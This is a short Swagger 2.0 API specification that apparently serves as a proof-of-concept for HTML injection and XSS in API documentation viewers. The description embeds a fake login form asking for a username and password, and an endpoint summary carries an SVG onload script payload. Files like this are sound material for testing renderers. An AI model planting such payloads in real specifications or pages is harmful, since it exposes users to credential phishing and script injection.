swagger: "2.0"
info:
  version: "1.0.0"
  title: "Fake Login Page"
  description: |
    <h2>HTML Injection : Fake Login</h2>
    <form>
      <label>Username</label><br>
      <input type="text" /><br><br>
      <label>Password</label><br>
      <input type="password" /><br><br>
      <button type="submit">Login</button>
    </form>
    <br>
    <img src="https://i.imgur.com/V3KjVdA.gif" width="100%" alt="Hacked" />
host: example.com
basePath: /
schemes:
  - https
paths:
  /test:
    get:
      summary: "<svg/onload=alert('html injected')>"
      description: "This is a test endpoint with HTML content"
      responses:
        200:
          description: "Successful response"
